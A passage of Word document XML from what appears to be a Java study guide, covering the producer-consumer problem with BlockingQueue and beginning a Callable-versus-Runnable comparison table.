          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>After consuming an item, the consumer calls notify() to notify the producer that there is space in the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E11E91B" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262"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Solution using BlockingQueue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4028B056"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BlockingQueue is part of the java.util.concurrent package and provides built-in methods to handle the Producer-Consumer problem. It automatically handles synchronization, so you don't need to manually use wait() and notify().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7401B313"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BlockingQueue has two main methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003FC5F5" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1134"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>put()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adds an item to the queue. If the queue is full, it waits until space becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299A0AC4" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1134"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>take()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes and returns an item from the queue. If the queue is empty, it waits until an item becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159BD4FA" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262"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Example using BlockingQueue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16463F88"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import java.util.concurrent.ArrayBlockingQueue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20000D8A"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import java.util.concurrent.BlockingQueue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D142566" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48EB91B8"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class ProducerConsumerWithBlockingQueue {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10422D9E"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rivate static final int CAPACITY = 5; // The capacity of the buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DCBDD8"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rivate BlockingQueue&lt;Integer&gt; queue = new ArrayBlockingQueue&lt;&gt;(CAPACITY); // Shared buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106BF132" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1810C9F5"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Producer thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572077B8"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void produce() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139DC522"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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A0636C"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7212F74E"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Produce an item and add it to the queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA659B4"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int item = (int) (Math.random() * 100); // Generate random item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CC3DA8"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queue.put(item); // Blocks if the queue is full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A664C1E"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Produced: " + item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2182FEEE"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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397AB6BF"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hread.currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C17F66"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214146DF"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6048922E"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5B1CDF40" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DAD93B5"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Consumer thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07087175"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void consume() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F53BCA"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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0003AD9F"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28285C31"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Consume an item from the queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F659CD1"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int item = queue.take(); // Blocks if the queue is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683DDD7F"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Consumed: " + item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286731FC"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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F54E71"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hread.currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CEF9DF"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0954E264"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187DCBE8"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2D0431E3" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14FAAA8F"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6DE24C"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roducerConsumerWithBlockingQueue pc = new ProducerConsumerWithBlockingQueue();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658F8035" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D36622C"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Create producer and consumer threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A61018F"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hread producerThread = new Thread(pc::produce);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3685A10B"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hread consumerThread = new Thread(pc::consume);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7FF185" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6162F2"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Start the threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D9967"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roducerThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B930D2A"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consumerThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236CCAC4"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1FAB981F" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F7ABB7" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8345C5" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1135"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: We use an ArrayBlockingQueue of a specified size (CAPACITY) as the shared buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5318A2E8" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1135"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The producer adds items to the queue using put(). If the queue is full, put() will block until space becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732E805C" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1135"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The consumer removes items from the queue using take(). If the queue is empty, take() will block until an item becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FF40B5" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262"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Advantages of BlockingQueue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30624030" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Automatic Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: BlockingQueue automatically handles the synchronization issues, so you don't need to manually use wait() and notify().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44454283" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The put() and take() methods block the producer and consumer threads as needed, which simplifies the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30156399" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Higher-level Abstraction</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a higher-level abstraction for managing concurrency and is safer and easier to work with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9AAD6A" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFB8444" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Producer-Consumer problem</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a classic synchronization problem, where multiple threads (producers and consumers) share a resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0DE67D" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using wait() and notify(), threads can communicate with each other to wait when the buffer is full or empty and notify when there is space or items to consume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5035AF" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1137"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BlockingQueue simplifies the implementation by handling synchronization internally and provides methods (put() and take()) to safely manage the shared buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684DEF8D" w14:textId="6235DF5E" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="3834F208">
          <v:rect id="_x0000_i1828" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B361DE3" w14:textId="0200728B" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="005A595A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="271" w:name="_Toc196307751"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Callable and Runnable. When should you use each</w:t>
      </w:r>
      <w:r w:rsidR="00C836C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="271"/>
    </w:p>
    <w:p w14:paraId="07B47D69" w14:textId="5FE4B9FC" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Both Callable and Runnable are functional interfaces used to represent tasks that can be executed concurrently in Java, but there are several key differences between the tw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2"/>
        <w:gridCol w:w="4092"/>
        <w:gridCol w:w="4120"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="0F6A95A9" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="323BECED" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FFD1A63" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F"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Runnable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BEA1D15" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F"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Callable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="301661D0" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06FC1E95"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Return Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="112DF7B9"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No return value (void)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B853386"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Returns a value of type V (generally T or any custom type)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="07D5813D" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65B34300"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Exception Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="291E3A0F"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Cannot throw checked exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07A609E0"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Can throw checked exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17D3F" w:rsidRPr="004E218C" w14:paraId="0E1FD03E" w14:textId="77777777" w:rsidTr="00B17D3F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24CBB0BE"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
